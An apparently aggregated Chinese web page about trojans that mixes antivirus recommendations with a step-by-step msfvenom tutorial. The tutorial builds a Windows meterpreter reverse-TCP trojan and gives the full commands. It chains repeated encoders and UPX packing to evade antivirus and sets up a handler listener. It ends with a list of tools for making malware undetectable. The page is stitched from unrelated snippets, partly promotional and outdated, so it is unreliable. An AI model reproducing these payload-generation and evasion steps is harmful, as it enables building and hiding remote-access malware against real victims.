木马程序的工作过程_木马程序的工具

电脑中木马了，好用的木马查杀软件有哪些？

电脑管家，相信这款软件大家也都不陌生，它跟360安全卫士一样，也是一款电脑安全软件，能够有效的预防与解决电脑上常见的安全风险。电脑管家拥有查杀木马、漏洞修复、系统加速等非常实用的功能，而且还独创了“管理+杀毒”二合一的开创性功能，依托小红伞(antivir)国际顶级杀毒引擎、腾讯云引擎等四核专业引擎查杀，完美地解决了杀毒修复问题，全方位保障上网安全。

杀木马病毒更好的软件

卡巴斯基7.0

卡巴斯基是世界上更优秀的杀毒软件，杀毒性能远远超过同类产品.

奇虎360安全卫士能查杀一些比较流行的木马病毒.对于有着良好上网习惯的用户是可以抛弃杀毒软件的.

瑞星杀毒软件2008正式版,对付那些能手动清楚的小菜鸟毒还可以,但是内存低于256m,cpu速度小于1.3Ghz的不要开监控.

至于缠身误杀门的卡巴斯基还有诺顿,唉,那已经是过去了.

现在的卡巴斯基已经推出了新版本7.0,新版本使用了很多新技术,还有升级完毕查杀备份,这就避免了误杀导致的系统一直崩溃问题.

其实用过卡巴斯基以及瑞星杀毒软件的人都可以毫不犹豫的选择卡巴斯基,瑞星虽然没有误杀过,可是遇到病毒根本就不管用!因为瑞星本身是靠病毒特征码来识别病毒的.

最重要的是,现在的杀毒软件都在打免费牌,卡巴斯基和奇虎360联合推出了整合卡巴斯基7.0的豪华360版本,360安全卫用户士就能获得半年卡巴斯基激活码,买正版也就40块.

pplive和赛门铁克-NOD32也搞了类似的活动,pplive用户可以使用诺顿最新版本180天,也是很划算的.

金山杀毒软件,比较适合那些规矩上网,从不浏览非法网站的用户.现在金山毒霸做的也可以了.我比较喜欢毒霸发布的那些专杀工具.虽然有时候一点也不管用.

江民杀毒软件,我是江民的老用户了,现在江民有2008版本,我也没用上,所以就不评论了.但是2004年的时候,那时候国内是江民一家独大呢.

还有一款免费的很有名气的就是McAfee的免费版本,我比较讨厌它的界面,很简单,不,是简陋.但是McAfee的防火墙在世界上排名是之一位的。

如何用msfvenom生成木马程序

一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.

二,工具:MSF

三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

四,过程:

1,查看帮助

命令: root# msfvenom -h

结果:

2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o

结果:

3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe abc.exe

注:如果只是用msfpayload生成,简单示例:

命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.113 X Desktop/abc.exe

多次生成可进行免杀:msfpayload windows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/Desktop/acn.exe

upx加壳：upx -5 /root/Desktop/acn.exe

结果:

说明: -p payload

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

LHOST,LPORT 监听上线的主机IP和端口

-f exe 生成EXE格式

4,把生成的abc.exe放到win7下.执行.

5,在命令行下,打开msfconsole.

命令: root # msfconsole

6,本机监听,因为之前用的是reverse_tcp,所以设置如下

命令: msf use exploit/multi/handler

Msf exploit(handler) set payload windows/meterpreter/reverset_tcp

结果:

7,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来.

8,.验证

木马做免杀都要用到哪些工具啊？

要看你做怎样的免杀，如果要过表面，用几个简单的花指令添加、压缩壳就可以了。如果要过主动，需要用到特征码定位工具MYCCL，修改工具C32A *** 、OL *** DBG。首先要进行特征码定位，然后用C32A *** 查找特征区块，进行汇编，过主动的工具就这些。过表面的工具就比较多了，百度都可以搜索到，并且可以下载，比如：大名鼎鼎的ASPROTECT、免疫007、紫迪捆绑器、暗组免杀捆绑器、怒剑狂花（花指令添加器）、还有我们系统自带的iexpress等等。以上就是答案了，希望楼主采纳！

请问木马专杀工具哪个好？

市面上基本所有的木马查杀工具，我都安装在电脑上试过了，最后选择了360安全卫士。之所以选择360安全卫士，主要是因为这款软件全新升级了六大安全引擎，接入360安全大脑全面提升检测能力，恶意程序样本库总样本量超200亿，能够对感染病毒或木马的文件进行精准修复，使系统运行更流畅。不仅如此，360安全卫士还能够实时更新病毒库，对新型病毒毫秒级响应，一站式解决木马威胁，让我十分安心。